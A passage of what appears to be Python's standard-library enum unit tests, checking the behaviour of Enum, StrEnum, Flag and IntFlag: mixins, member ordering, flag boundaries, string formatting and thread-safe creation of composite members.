RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ReformedColor.RED.value, 1)
self.assertEqual(ReformedColor.GREEN.value, 2)
self.assertEqual(ReformedColor.BLUE.value, 3)
self.assertEqual(str(ReformedColor.BLUE), 'blue')
self.assertEqual(ReformedColor.RED.behavior(), 'booyah')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
self.assertTrue(issubclass(ReformedColor, int))
def test_multiple_inherited_mixin(self):
@unique
class Decision1(StrEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
class MyEnum(StrEnum):
pass
@unique
class Decision2(MyEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
def test_multiple_mixin_inherited(self):
class MyInt(int):
def __new__(cls, value):
return super().__new__(cls, value)
class HexMixin:
def __repr__(self):
return hex(self)
class MyIntEnum(HexMixin, MyInt, enum.Enum):
pass
class Foo(MyIntEnum):
TEST = 1
self.assertTrue(isinstance(Foo.TEST, MyInt))
self.assertEqual(repr(Foo.TEST), "0x1")
class Fee(MyIntEnum):
TEST = 1
def __new__(cls, value):
value += 1
member = int.__new__(cls, value)
member._value_ = value
return member
self.assertEqual(Fee.TEST, 2)
def test_miltuple_mixin_with_common_data_type(self):
class CaseInsensitiveStrEnum(str, Enum):
@classmethod
def _missing_(cls, value):
for member in cls._member_map_.values():
if member._value_.lower() == value.lower():
return member
return super()._missing_(value)
#
class LenientStrEnum(str, Enum):
def __init__(self, *args):
self._valid = True
@classmethod
def _missing_(cls, value):
unknown = cls._member_type_.__new__(cls, value)
unknown._valid = False
unknown._name_ = value.upper()
unknown._value_ = value
cls._member_map_[value] = unknown
return unknown
@property
def valid(self):
return self._valid
#
class JobStatus(CaseInsensitiveStrEnum, LenientStrEnum):
ACTIVE = "active"
PENDING = "pending"
TERMINATED = "terminated"
#
JS = JobStatus
self.assertEqual(list(JobStatus), [JS.ACTIVE, JS.PENDING, JS.TERMINATED])
self.assertEqual(JS.ACTIVE, 'active')
self.assertEqual(JS.ACTIVE.value, 'active')
self.assertIs(JS('Active'), JS.ACTIVE)
self.assertTrue(JS.ACTIVE.valid)
missing = JS('missing')
self.assertEqual(list(JobStatus), [JS.ACTIVE, JS.PENDING, JS.TERMINATED])
self.assertEqual(JS.ACTIVE, 'active')
self.assertEqual(JS.ACTIVE.value, 'active')
self.assertIs(JS('Active'), JS.ACTIVE)
self.assertTrue(JS.ACTIVE.valid)
self.assertTrue(isinstance(missing, JS))
self.assertFalse(missing.valid)
def test_empty_globals(self):
# bpo-35717: sys._getframe(2).f_globals['__name__'] fails with KeyError
# when using compile and exec because f_globals is empty
code = "from enum import Enum; Enum('Animal', 'ANT BEE CAT DOG')"
code = compile(code, "<string>", "exec")
global_ns = {}
local_ls = {}
exec(code, global_ns, local_ls)
def test_strenum(self):
class GoodStrEnum(StrEnum):
one = '1'
two = '2'
three = b'3', 'ascii'
four = b'4', 'latin1', 'strict'
self.assertEqual(GoodStrEnum.one, '1')
self.assertEqual(str(GoodStrEnum.one), '1')
self.assertEqual('{}'.format(GoodStrEnum.one), '1')
self.assertEqual(GoodStrEnum.one, str(GoodStrEnum.one))
self.assertEqual(GoodStrEnum.one, '{}'.format(GoodStrEnum.one))
self.assertEqual(repr(GoodStrEnum.one), 'GoodStrEnum.one')
#
class DumbMixin:
def __str__(self):
return "don't do this"
class DumbStrEnum(DumbMixin, StrEnum):
five = '5'
six = '6'
seven = '7'
self.assertEqual(DumbStrEnum.seven, '7')
self.assertEqual(str(DumbStrEnum.seven), "don't do this")
#
class EnumMixin(Enum):
def hello(self):
print('hello from %s' % (self, ))
class HelloEnum(EnumMixin, StrEnum):
eight = '8'
self.assertEqual(HelloEnum.eight, '8')
self.assertEqual(HelloEnum.eight, str(HelloEnum.eight))
#
class GoodbyeMixin:
def goodbye(self):
print('%s wishes you a fond farewell')
class GoodbyeEnum(GoodbyeMixin, EnumMixin, StrEnum):
nine = '9'
self.assertEqual(GoodbyeEnum.nine, '9')
self.assertEqual(GoodbyeEnum.nine, str(GoodbyeEnum.nine))
#
with self.assertRaisesRegex(TypeError, '1 is not a string'):
class FirstFailedStrEnum(StrEnum):
one = 1
two = '2'
with self.assertRaisesRegex(TypeError, "2 is not a string"):
class SecondFailedStrEnum(StrEnum):
one = '1'
two = 2,
three = '3'
with self.assertRaisesRegex(TypeError, '2 is not a string'):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = 2
with self.assertRaisesRegex(TypeError, 'encoding must be a string, not %r' % (sys.getdefaultencoding, )):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = b'2', sys.getdefaultencoding
with self.assertRaisesRegex(TypeError, 'errors must be a string, not 9'):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = b'2', 'ascii', 9
@unittest.skipIf(
python_version >= (3, 12),
'mixin-format now uses member instead of member.value',
)
def test_custom_strenum_with_warning(self):
class CustomStrEnum(str, Enum):
pass
class OkayEnum(CustomStrEnum):
one = '1'
two = '2'
three = b'3', 'ascii'
four = b'4', 'latin1', 'strict'
self.assertEqual(OkayEnum.one, '1')
self.assertEqual(str(OkayEnum.one), 'one')
with self.assertWarns(DeprecationWarning):
self.assertEqual('{}'.format(OkayEnum.one), '1')
self.assertEqual(OkayEnum.one, '{}'.format(OkayEnum.one))
self.assertEqual(repr(OkayEnum.one), 'OkayEnum.one')
#
class DumbMixin:
def __str__(self):
return "don't do this"
class DumbStrEnum(DumbMixin, CustomStrEnum):
five = '5'
six = '6'
seven = '7'
self.assertEqual(DumbStrEnum.seven, '7')
self.assertEqual(str(DumbStrEnum.seven), "don't do this")
#
class EnumMixin(Enum):
def hello(self):
print('hello from %s' % (self, ))
class HelloEnum(EnumMixin, CustomStrEnum):
eight = '8'
self.assertEqual(HelloEnum.eight, '8')
self.assertEqual(str(HelloEnum.eight), 'eight')
#
class GoodbyeMixin:
def goodbye(self):
print('%s wishes you a fond farewell')
class GoodbyeEnum(GoodbyeMixin, EnumMixin, CustomStrEnum):
nine = '9'
self.assertEqual(GoodbyeEnum.nine, '9')
self.assertEqual(str(GoodbyeEnum.nine), 'nine')
#
class FirstFailedStrEnum(CustomStrEnum):
one = 1 # this will become '1'
two = '2'
class SecondFailedStrEnum(CustomStrEnum):
one = '1'
two = 2, # this will become '2'
three = '3'
class ThirdFailedStrEnum(CustomStrEnum):
one = '1'
two = 2 # this will become '2'
with self.assertRaisesRegex(TypeError, '.encoding. must be str, not '):
class ThirdFailedStrEnum(CustomStrEnum):
one = '1'
two = b'2', sys.getdefaultencoding
with self.assertRaisesRegex(TypeError, '.errors. must be str, not '):
class ThirdFailedStrEnum(CustomStrEnum):
one = '1'
two = b'2', 'ascii', 9
@unittest.skipIf(
python_version < (3, 12),
'mixin-format currently uses member.value',
)
def test_custom_strenum(self):
class CustomStrEnum(str, Enum):
pass
class OkayEnum(CustomStrEnum):
one = '1'
two = '2'
three = b'3', 'ascii'
four = b'4', 'latin1', 'strict'
self.assertEqual(OkayEnum.one, '1')
self.assertEqual(str(OkayEnum.one), 'one')
self.assertEqual('{}'.format(OkayEnum.one), 'one')
self.assertEqual(repr(OkayEnum.one), 'OkayEnum.one')
#
class DumbMixin:
def __str__(self):
return "don't do this"
class DumbStrEnum(DumbMixin, CustomStrEnum):
five = '5'
six = '6'
seven = '7'
self.assertEqual(DumbStrEnum.seven, '7')
self.assertEqual(str(DumbStrEnum.seven), "don't do this")
#
class EnumMixin(Enum):
def hello(self):
print('hello from %s' % (self, ))
class HelloEnum(EnumMixin, CustomStrEnum):
eight = '8'
self.assertEqual(HelloEnum.eight, '8')
self.assertEqual(str(HelloEnum.eight), 'eight')
#
class GoodbyeMixin:
def goodbye(self):
print('%s wishes you a fond farewell')
class GoodbyeEnum(GoodbyeMixin, EnumMixin, CustomStrEnum):
nine = '9'
self.assertEqual(GoodbyeEnum.nine, '9')
self.assertEqual(str(GoodbyeEnum.nine), 'nine')
#
class FirstFailedStrEnum(CustomStrEnum):
one = 1 # this will become '1'
two = '2'
class SecondFailedStrEnum(CustomStrEnum):
one = '1'
two = 2, # this will become '2'
three = '3'
class ThirdFailedStrEnum(CustomStrEnum):
one = '1'
two = 2 # this will become '2'
with self.assertRaisesRegex(TypeError, '.encoding. must be str, not '):
class ThirdFailedStrEnum(CustomStrEnum):
one = '1'
two = b'2', sys.getdefaultencoding
with self.assertRaisesRegex(TypeError, '.errors. must be str, not '):
class ThirdFailedStrEnum(CustomStrEnum):
one = '1'
two = b'2', 'ascii', 9
def test_missing_value_error(self):
with self.assertRaisesRegex(TypeError, "_value_ not set in __new__"):
class Combined(str, Enum):
#
def __new__(cls, value, sequence):
enum = str.__new__(cls, value)
if '(' in value:
fis_name, segment = value.split('(', 1)
segment = segment.strip(' )')
else:
fis_name = value
segment = None
enum.fis_name = fis_name
enum.segment = segment
enum.sequence = sequence
return enum
#
def __repr__(self):
return "<%s.%s>" % (self.__class__.__name__, self._name_)
#
key_type = 'An$(1,2)', 0
company_id = 'An$(3,2)', 1
code = 'An$(5,1)', 2
description = 'Bn$', 3
@unittest.skipUnless(
python_version == (3, 9),
'private variables are now normal attributes',
)
def test_warning_for_private_variables(self):
with self.assertWarns(DeprecationWarning):
class Private(Enum):
__corporal = 'Radar'
self.assertEqual(Private._Private__corporal.value, 'Radar')
try:
with self.assertWarns(DeprecationWarning):
class Private(Enum):
__major_ = 'Hoolihan'
except ValueError:
pass
def test_private_variable_is_normal_attribute(self):
class Private(Enum):
__corporal = 'Radar'
__major_ = 'Hoolihan'
self.assertEqual(Private._Private__corporal, 'Radar')
self.assertEqual(Private._Private__major_, 'Hoolihan')
@unittest.skipUnless(
python_version < (3, 12),
'member-member access now raises an exception',
)
def test_warning_for_member_from_member_access(self):
with self.assertWarns(DeprecationWarning):
class Di(Enum):
YES = 1
NO = 0
nope = Di.YES.NO
self.assertIs(Di.NO, nope)
@unittest.skipUnless(
python_version >= (3, 12),
'member-member access currently issues a warning',
)
def test_exception_for_member_from_member_access(self):
with self.assertRaisesRegex(AttributeError, "Di: no instance attribute .NO."):
class Di(Enum):
YES = 1
NO = 0
nope = Di.YES.NO
def test_strenum_auto(self):
class Strings(StrEnum):
ONE = auto()
TWO = auto()
self.assertEqual([Strings.ONE, Strings.TWO], ['one', 'two'])
def test_dynamic_members_with_static_methods(self):
#
foo_defines = {'FOO_CAT': 'aloof', 'BAR_DOG': 'friendly', 'FOO_HORSE': 'big'}
class Foo(Enum):
vars().update({
k: v
for k, v in foo_defines.items()
if k.startswith('FOO_')
})
def upper(self):
return self.value.upper()
self.assertEqual(list(Foo), [Foo.FOO_CAT, Foo.FOO_HORSE])
self.assertEqual(Foo.FOO_CAT.value, 'aloof')
self.assertEqual(Foo.FOO_HORSE.upper(), 'BIG')
#
with self.assertRaisesRegex(TypeError, "'FOO_CAT' already defined as: 'aloof'"):
class FooBar(Enum):
vars().update({
k: v
for k, v in foo_defines.items()
if k.startswith('FOO_')
},
**{'FOO_CAT': 'small'},
)
def upper(self):
return self.value.upper()
class TestOrder(unittest.TestCase):
def test_same_members(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
def test_same_members_with_aliases(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
verde = green
def test_same_members_wrong_order(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
blue = 3
green = 2
def test_order_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
def test_order_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
verde = green
def test_enum_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
def test_enum_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
verde = green
class TestFlag(unittest.TestCase):
"""Tests of the Flags."""
class Perm(Flag):
R, W, X = 4, 2, 1
class Open(Flag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(Flag):
BLACK = 0
RED = 1
ROJO = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
WHITE = RED|GREEN|BLUE
BLANCO = RED|GREEN|BLUE
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'R')
self.assertEqual(str(Perm.W), 'W')
self.assertEqual(str(Perm.X), 'X')
self.assertEqual(str(Perm.R | Perm.W), 'R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'R|W|X')
self.assertEqual(str(Perm(0)), 'Perm(0)')
self.assertEqual(str(~Perm.R), 'W|X')
self.assertEqual(str(~Perm.W), 'R|X')
self.assertEqual(str(~Perm.X), 'R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm(0)')
self.assertEqual(str(Perm(~0)), 'R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'RO')
self.assertEqual(str(Open.WO), 'WO')
self.assertEqual(str(Open.AC), 'AC')
self.assertEqual(str(Open.RO | Open.CE), 'CE')
self.assertEqual(str(Open.WO | Open.CE), 'WO|CE')
self.assertEqual(str(~Open.RO), 'WO|RW|CE')
self.assertEqual(str(~Open.WO), 'RW|CE')
self.assertEqual(str(~Open.AC), 'CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'AC')
self.assertEqual(str(~(Open.WO | Open.CE)), 'RW')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), 'Perm.R')
self.assertEqual(repr(Perm.W), 'Perm.W')
self.assertEqual(repr(Perm.X), 'Perm.X')
self.assertEqual(repr(Perm.R | Perm.W), 'Perm.R|Perm.W')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), 'Perm.R|Perm.W|Perm.X')
self.assertEqual(repr(Perm(0)), '0x0')
self.assertEqual(repr(~Perm.R), 'Perm.W|Perm.X')
self.assertEqual(repr(~Perm.W), 'Perm.R|Perm.X')
self.assertEqual(repr(~Perm.X), 'Perm.R|Perm.W')
self.assertEqual(repr(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '0x0')
self.assertEqual(repr(Perm(~0)), 'Perm.R|Perm.W|Perm.X')
Open = self.Open
self.assertEqual(repr(Open.RO), 'Open.RO')
self.assertEqual(repr(Open.WO), 'Open.WO')
self.assertEqual(repr(Open.AC), 'Open.AC')
self.assertEqual(repr(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(repr(Open.WO | Open.CE), 'Open.WO|Open.CE')
self.assertEqual(repr(~Open.RO), 'Open.WO|Open.RW|Open.CE')
self.assertEqual(repr(~Open.WO), 'Open.RW|Open.CE')
self.assertEqual(repr(~Open.AC), 'Open.CE')
self.assertEqual(repr(~(Open.RO | Open.CE)), 'Open.AC')
self.assertEqual(repr(~(Open.WO | Open.CE)), 'Open.RW')
def test_format(self):
Perm = self.Perm
self.assertEqual(format(Perm.R, ''), 'R')
self.assertEqual(format(Perm.R | Perm.X, ''), 'R|X')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i | j), Perm(i.value | j.value))
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for i in Perm:
self.assertIs(i | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual((i & j).value, i.value & j.value)
self.assertIs(type(i & j), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & RWX, i)
self.assertIs(RWX & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for i in Perm:
self.assertIs(i ^ Perm(0), i)
self.assertIs(Perm(0) ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_boundary(self):
self.assertIs(enum.Flag._boundary_, STRICT)
class Iron(Flag, boundary=STRICT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Iron._boundary_, STRICT)
#
class Water(Flag, boundary=CONFORM):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Water._boundary_, CONFORM)
#
class Space(Flag, boundary=EJECT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Space._boundary_, EJECT)
#
class Bizarre(Flag, boundary=KEEP):
b = 3
c = 4
d = 6
#
self.assertRaisesRegex(ValueError, 'invalid value: 7', Iron, 7)
#
self.assertIs(Water(7), Water.ONE|Water.TWO)
self.assertIs(Water(~9), Water.TWO)
#
self.assertEqual(Space(7), 7)
self.assertTrue(type(Space(7)) is int)
#
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertIs(Bizarre(3), Bizarre.b)
self.assertIs(Bizarre(6), Bizarre.d)
def test_iter(self):
Color = self.Color
Open = self.Open
self.assertEqual(list(Color), [Color.RED, Color.GREEN, Color.BLUE])
self.assertEqual(list(Open), [Open.WO, Open.RW, Open.CE])
def test_programatic_function_string(self):
Perm = Flag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = Flag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = Flag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = Flag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = Flag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_pickle(self):
if isinstance(FlagStooges, Exception):
raise FlagStooges
test_pickle_dump_load(self.assertIs, FlagStooges.CURLY|FlagStooges.MOE)
test_pickle_dump_load(self.assertIs, FlagStooges)
@unittest.skipIf(
python_version >= (3, 12),
'__contains__ now returns True/False for all inputs',
)
def test_contains_er(self):
Open = self.Open
Color = self.Color
self.assertFalse(Color.BLACK in Open)
self.assertFalse(Open.RO in Color)
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'BLACK' in Color
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'RO' in Open
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
1 in Color
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
1 in Open
@unittest.skipIf(
python_version < (3, 12),
'__contains__ only works with enum memmbers before 3.12',
)
def test_contains_tf(self):
Open = self.Open
Color = self.Color
self.assertFalse(Color.BLACK in Open)
self.assertFalse(Open.RO in Color)
self.assertFalse('BLACK' in Color)
self.assertFalse('RO' in Open)
self.assertTrue(1 in Color)
self.assertTrue(1 in Open)
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
def test_member_iter(self):
Color = self.Color
self.assertEqual(list(Color.BLACK), [])
self.assertEqual(list(Color.PURPLE), [Color.RED, Color.BLUE])
self.assertEqual(list(Color.BLUE), [Color.BLUE])
self.assertEqual(list(Color.GREEN), [Color.GREEN])
self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE])
self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE])
def test_member_length(self):
self.assertEqual(self.Color.__len__(self.Color.BLACK), 0)
self.assertEqual(self.Color.__len__(self.Color.GREEN), 1)
self.assertEqual(self.Color.__len__(self.Color.PURPLE), 2)
self.assertEqual(self.Color.__len__(self.Color.BLANCO), 3)
def test_number_reset_and_order_cleanup(self):
class Confused(Flag):
_order_ = 'ONE TWO FOUR DOS EIGHT SIXTEEN'
ONE = auto()
TWO = auto()
FOUR = auto()
DOS = 2
EIGHT = auto()
SIXTEEN = auto()
self.assertEqual(
list(Confused),
[Confused.ONE, Confused.TWO, Confused.FOUR, Confused.EIGHT, Confused.SIXTEEN])
self.assertIs(Confused.TWO, Confused.DOS)
self.assertEqual(Confused.DOS._value_, 2)
self.assertEqual(Confused.EIGHT._value_, 8)
self.assertEqual(Confused.SIXTEEN._value_, 16)
def test_aliases(self):
Color = self.Color
self.assertEqual(Color(1).name, 'RED')
self.assertEqual(Color['ROJO'].name, 'RED')
self.assertEqual(Color(7).name, 'WHITE')
self.assertEqual(Color['BLANCO'].name, 'WHITE')
self.assertIs(Color.BLANCO, Color.WHITE)
Open = self.Open
self.assertIs(Open['AC'], Open.AC)
def test_auto_number(self):
class Color(Flag):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 4)
def test_auto_number_garbage(self):
with self.assertRaisesRegex(TypeError, 'Invalid Flag value: .not an int.'):
class Color(Flag):
red = 'not an int'
blue = auto()
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'BLUE')
class Color(AllMixin, StrMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@threading_helper.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(Flag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with threading_helper.start_threads(threads):
pass
# check that only 248 members were created
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
def test_init_subclass(self):
class MyEnum(Flag):
def __init_subclass__(cls, **kwds):
super().__init_subclass__(**kwds)
self.assertFalse(cls.__dict__.get('_test', False))
cls._test1 = 'MyEnum'
#
class TheirEnum(MyEnum):
def __init_subclass__(cls, **kwds):
super(TheirEnum, cls).__init_subclass__(**kwds)
cls._test2 = 'TheirEnum'
class WhoseEnum(TheirEnum):
def __init_subclass__(cls, **kwds):
pass
class NoEnum(WhoseEnum):
ONE = 1
self.assertEqual(TheirEnum.__dict__['_test1'], 'MyEnum')
self.assertEqual(WhoseEnum.__dict__['_test1'], 'MyEnum')
self.assertEqual(WhoseEnum.__dict__['_test2'], 'TheirEnum')
self.assertFalse(NoEnum.__dict__.get('_test1', False))
self.assertFalse(NoEnum.__dict__.get('_test2', False))
#
class OurEnum(MyEnum):
def __init_subclass__(cls, **kwds):
cls._test2 = 'OurEnum'
class WhereEnum(OurEnum):
def __init_subclass__(cls, **kwds):
pass
class NeverEnum(WhereEnum):
ONE = 1
self.assertEqual(OurEnum.__dict__['_test1'], 'MyEnum')
self.assertFalse(WhereEnum.__dict__.get('_test1', False))
self.assertEqual(WhereEnum.__dict__['_test2'], 'OurEnum')
self.assertFalse(NeverEnum.__dict__.get('_test1', False))
self.assertFalse(NeverEnum.__dict__.get('_test2', False))
def test_default_missing(self):
with self.assertRaisesRegex(
ValueError,
"'RED' is not a valid TestFlag.Color",
) as ctx:
self.Color('RED')
self.assertIs(ctx.exception.__context__, None)
P = Flag('P', 'X Y')
with self.assertRaisesRegex(ValueError, "'X' is not a valid P") as ctx:
P('X')
self.assertIs(ctx.exception.__context__, None)
class TestIntFlag(unittest.TestCase):
"""Tests of the IntFlags."""
class Perm(IntFlag):
R = 1 << 2
W = 1 << 1
X = 1 << 0
class Open(IntFlag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(IntFlag):
BLACK = 0
RED = 1
ROJO = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
WHITE = RED|GREEN|BLUE
BLANCO = RED|GREEN|BLUE
class Skip(IntFlag):
FIRST = 1
SECOND = 2
EIGHTH = 8
def test_type(self):
Perm = self.Perm
self.assertTrue(Perm._member_type_ is int)
Open = self.Open
for f in Perm:
self.assertTrue(isinstance(f, Perm))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Perm.W | Perm.X, Perm))
self.assertEqual(Perm.W | Perm.X, 3)
for f in Open:
self.assertTrue(isinstance(f, Open))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Open.WO | Open.RW, Open))
self.assertEqual(Open.WO | Open.RW, 3)
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'R')
self.assertEqual(str(Perm.W), 'W')
self.assertEqual(str(Perm.X), 'X')
self.assertEqual(str(Perm.R | Perm.W), 'R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'R|W|X')
self.assertEqual(str(Perm.R | 8), '12')
self.assertEqual(str(Perm(0)), 'Perm(0)')
self.assertEqual(str(Perm(8)), '8')
self.assertEqual(str(~Perm.R), 'W|X')
self.assertEqual(str(~Perm.W), 'R|X')
self.assertEqual(str(~Perm.X), 'R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm(0)')
